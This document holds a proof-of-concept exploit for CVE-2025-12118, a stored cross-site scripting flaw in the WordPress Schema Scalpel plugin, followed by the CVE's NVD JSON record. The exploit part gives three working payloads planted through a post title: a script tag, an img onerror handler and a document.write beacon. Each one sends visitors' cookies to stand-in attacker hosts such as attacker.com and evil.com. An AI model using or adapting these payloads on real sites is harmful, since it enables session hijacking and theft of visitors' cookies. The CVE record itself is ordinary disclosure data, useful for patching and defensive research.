CVE-2025-12118

// CVE-2025-12118 PoC - Stored XSS in Schema Scalpel Plugin // Author: Contributor-level attacker // Target: WordPress site with Schema Scalpel plugin <= 1.6.1 // Step 1: Create or edit a post with malicious title // Title payload: const maliciousTitle = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'; // Step 2: The payload will be embedded in JSON-LD like: // <script type="application/ld+json"> // { // "@context": "https://schema.org", // "@type": "Article", // "headline": "<script>fetch(\"https://attacker.com/steal?c=\"+document.cookie)</script>", // ... // } // </script> // Step 3: When victim visits the page, XSS executes // Example exploitation: const xssPayload = ` <img src=x onerror=" fetch('https://attacker.com/log?cookie=' + btoa(document.cookie)) .then(r => r.text()) .then(data => console.log('Stolen:', data)) "> `; // Alternative payload for session hijacking: const sessionHijackPayload = ` <script> document.write('<img src="https://evil.com/log?cookie=' + encodeURIComponent(document.cookie) + '">'); </script> `;

{"cve": {"id": "CVE-2025-12118", "sourceIdentifier": "[email protected]", "published": "2025-11-01T05:16:02.590", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Schema Scalpel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the post title in all versions up to, and including, 1.6.1 due to insufficient input sanitization and output escaping when outputting user-supplied data into JSON-LD schema markup. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/kevingillispie/Schema-Scalpel/commit/0a24430ed4f99a3998d032e755cd97a57d4fae29", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/schema-scalpel/tags/1.6.1/public/class-schema-scalpel-public.php#L146", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/schema-scalpel/tags/1.6.1/public/class-schema-scalpel-public.php#L183", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9289e93c-22ac-4f3f-8a8a-591d9a598713?source=cve", "source": "[email protected]"}]}}